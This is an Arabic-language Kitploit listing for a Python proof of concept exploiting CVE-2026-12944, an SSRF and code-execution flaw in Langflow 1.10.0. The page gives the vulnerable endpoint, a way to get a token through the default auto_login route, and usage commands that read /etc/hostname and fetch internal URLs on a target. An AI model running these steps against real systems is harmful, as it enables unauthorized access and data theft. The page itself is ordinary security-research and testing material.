Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-12944 — Python PoC يستغل CVE-2026-12944، وهو SSRF في Langflow 1.10.0 عبر urllib في المكونات المخصصة، مع قدرات القراءة والجلب الموثقة. | Kitploit
أدوات/GitHubGitHub/shadowforge-cyber/cve-2026-12944
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأمن واجهات برمجة التطبيقات
GitHubshadowforge-cyber/cve-2026-12944

CVE-2026-12944

Python PoC يستغل CVE-2026-12944، وهو SSRF في Langflow 1.10.0 عبر urllib في المكونات المخصصة، مع قدرات القراءة والجلب الموثقة.

عرض المستودع
منذ 19س 28دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-12944: Langflow 1.10.0 — urllib SSRF

Langflow OSS (≤ 1.10.0) — ثغرة تسمح بتنفيذ تعليمات برمجية عشوائية عبر urllib.request / socket في المكوّنات المخصّصة.
تجاوز ماسح المكوّنات قائمة الحظر الخاصة بهذه الوحدات من المكتبة القياسية. تم إصلاحها في 1.10.1 (IBM).

الخطورة: PR:L (قابلة لإعادة الإنتاج علنًا / خطورة منخفضة)

نقطة نهاية الاستغلال: POST /api/v1/custom_component
تتطلب ملف تعريف ارتباط للجلسة أو رمز bearer.

كيفية الحصول على وصول مُصادَق عليه (3 مسارات سهلة)

  1. --test — لا يتطلب مصادقة. ينفّذ فقط GET /api/v1/version العام.
  2. --read / --fetch — المصادقة أولًا:
  • تسجيل الدخول التلقائي مُفعَّل (الافتراضي في Langflow الأصلي):
    GET /api/v1/auto_login. إذا احتوى رد JSON على access_token، أرسل Authorization: Bearer … (دون الحاجة إلى اسم مستخدم/كلمة مرور).
  • تسجيل الدخول التلقائي مُعطَّل:
    POST /api/v1/login باستخدام --uname / --password بصيغة application/x-www-form-urlencoded.
  • بعد تسجيل الدخول، أرسل الحمولة إلى POST /api/v1/custom_component.
  • يُستخدم --uname / --password فقط إذا كان تسجيل الدخول التلقائي مُعطَّلًا. في التثبيت الافتراضي الأصلي يتم تجاهلهما.

    لأغراض الاختبار المصرَّح به فقط. لا تستخدم هذا ضد أنظمة لا تملكها أو لا تملك إذنًا صريحًا باختبارها.

    المتطلبات: Python 3 (المكتبة القياسية فقط).

    أمثلة الاستخدام

    root@kitploit:~
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --test
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --read /etc/hostname
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --fetch http://127.0.0.1:7860/api/v1/version
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u https://TARGET --read /etc/hostname --insecure
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u TARGET --uname langflow --password langflow --read /etc/hostname
    

    الشكر

    التقرير وإثبات المفهوم: ShadowForge Cyber

    تنزيل الأداة